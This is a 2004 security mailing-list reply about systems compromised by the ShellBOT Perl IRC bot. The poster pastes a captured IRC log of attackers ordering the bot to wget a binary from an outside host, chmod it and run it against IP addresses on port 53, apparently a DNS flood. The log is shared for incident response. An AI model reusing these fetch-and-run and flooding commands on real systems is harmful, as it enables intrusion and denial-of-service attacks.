Security Incidents mailing list archives
Re: Systems compromised with ShellBOT perl script - part 2
From: "nathan c. dickerson" <nathan () pro net>
Date: Thu, 16 Sep 2004 15:47:38 -0700
These are the same guys, using the same exploits that I've dealt with many moons ago.
sly and juntz same guys, same tricks make sure you watch your /dev/shm directories.. -> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4
<- PRIVMSG #brdata :doze4: no process killed -> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4 <- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget http://members.lycos.co.uk/gookboy/doze4 <- PRIVMSG #brdata :--13:52:35-- http://members.lycos.co.uk/gookboy/doze4 <- PRIVMSG #brdata : => `doze4' <- PRIVMSG #brdata :Resolving members.lycos.co.uk... done. <- PRIVMSG #brdata :Connecting to members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused. -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4 <- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such file or directory -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 81.29.36.147 53 www.ibm.com -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4 -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 65.248.51.13 53 www.ibm.com <- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory
Current thread:
- Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 ASI (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 nathan c. dickerson (Sep 19)